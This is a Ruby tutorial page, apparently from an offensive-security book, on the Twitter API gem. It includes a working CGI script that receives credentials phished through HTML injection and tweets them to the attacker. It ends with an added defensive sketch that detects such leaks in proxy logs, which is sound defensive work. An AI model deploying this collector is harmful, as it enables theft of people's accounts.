Twitter API
Dealing with Twitter's API is really useful for information gathering, taxonomy and social engineering. However, you need some keys and tokens in order to interact with Twitter's APIs. To get them, please refer to the official Twitter development page.
  • Install Twitter API gem
    gem install twitter

Basic Usage

rubyfu-tweet.rb
#!/usr/bin/env ruby
# KING SABRI | @KINGSABRI
#
require 'twitter'
require 'pp'

client = Twitter::REST::Client.new do |config|
  config.consumer_key        = "YOUR_CONSUMER_KEY"
  config.consumer_secret     = "YOUR_CONSUMER_SECRET"
  config.access_token        = "YOUR_ACCESS_TOKEN"
  config.access_token_secret = "YOUR_ACCESS_SECRET"
end

puts client.user("Rubyfu")                                       # Fetch a user
puts client.update("@Rubyfu w00t! #Rubyfu")                      # Tweet (as the authenticated user)
puts client.follow("Rubyfu")                                     # Follow User (as the authenticated user)
puts client.followers("Rubyfu")                                  # Fetch followers of a user
puts client.followers                                            # Fetch followers of current user
puts client.status(649235138585366528)                           # Fetch a particular Tweet by ID
puts client.create_direct_message("Rubyfu", "Hi, I'm KINGSABRI") # Send direct message to a particular user
Your turn: tweet to @Rubyfu using the above example. Tweet your code and output to @Rubyfu.

Building Stolen Credentials notification bot

We're exploiting an XSS/HTML injection vulnerability and tricking users into entering their username and password. The idea is that we'll make a CGI script that takes those stolen credentials and then tweets them to us as a notification or log system.
#!/usr/bin/ruby -w

require 'cgi'
require 'uri'
require 'twitter'

cgi = CGI.new
puts cgi.header

user = CGI.escape cgi['user']
pass = CGI.escape cgi['pass']
time = Time.now.strftime("%D %T")

client = Twitter::REST::Client.new do |config|
  config.consumer_key        = "YOUR_CONSUMER_KEY"
  config.consumer_secret     = "YOUR_CONSUMER_SECRET"
  config.access_token        = "YOUR_ACCESS_TOKEN"
  config.access_token_secret = "YOUR_ACCESS_SECRET"
end
client.user("KINGSABRI")

if cgi.referer.nil? or cgi.referer.empty?
  # Twitter notification | WARNING! It's tweets, make sure your account is protected!!!
  client.update("[Info] No Referer!\n" + "#{CGI.unescape user}:#{CGI.unescape pass}")
else
  client.update("[Info] #{cgi.referer}\n #{CGI.unescape user}:#{CGI.unescape pass}")
end

puts ""
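
Seen from the defending side, a collector like the one above leaves a trace in egress proxy logs: a request to an outside host carrying both the `user` and `pass` parameters the script reads, with a Referer from a different site or none at all. The following detection sketch is an added example, not part of the original page; it assumes the parameters appear in the logged URL, and the log layout, the `.example` host names and the `suspicious_requests` helper are constructed for illustration.

```ruby
require 'uri'

# Parameter names the CGI collector on this page reads: cgi['user'], cgi['pass'].
CRED_PARAMS = %w[user pass].freeze

# Constructed sample proxy log: "time client method url referer" ("-" = no Referer).
# Hosts are reserved .example names; none of this is real traffic.
SAMPLE_LOG = <<~LOG
  2024-01-10T09:00:01Z 10.0.0.5 GET http://intranet.example/login?user=alice&pass=x http://intranet.example/
  2024-01-10T09:00:07Z 10.0.0.7 GET http://collector.example/cgi-bin/log.rb?user=bob&pass=hunter2 http://shop.example/search?q=1
  2024-01-10T09:00:09Z 10.0.0.8 GET http://collector.example/cgi-bin/log.rb?user=eve&pass=pw -
  2024-01-10T09:00:12Z 10.0.0.9 GET http://news.example/article?id=7&user=guest http://news.example/
  malformed entry
LOG

# Parse a URL, returning nil instead of raising on malformed input.
def parse_uri(str)
  URI.parse(str)
rescue URI::InvalidURIError
  nil
end

# Return one hash per request that sends both credential parameters to a host
# other than the one named in the Referer (or that has no Referer at all).
def suspicious_requests(log_text)
  log_text.each_line.filter_map do |line|
    time, client, _method, url, referer = line.split
    uri = url && parse_uri(url)
    next unless uri&.host && uri.query

    keys = URI.decode_www_form(uri.query).map(&:first)
    next unless CRED_PARAMS.all? { |p| keys.include?(p) }

    ref_host = referer && referer != '-' ? parse_uri(referer)&.host : nil
    next if ref_host && ref_host.casecmp?(uri.host) # same-site login, not cross-site

    # Never log the submitted values themselves, only who sent them and where.
    { time: time, client: client, dest: uri.host, referer: ref_host || '(none)' }
  end
end

if __FILE__ == $PROGRAM_NAME
  suspicious_requests(SAMPLE_LOG).each do |hit|
    puts "#{hit[:time]} #{hit[:client]} -> #{hit[:dest]} (referer: #{hit[:referer]})"
  end
end
```

Each hit identifies a client whose credentials should be treated as exposed, and the Referer host points to the page carrying the injected form.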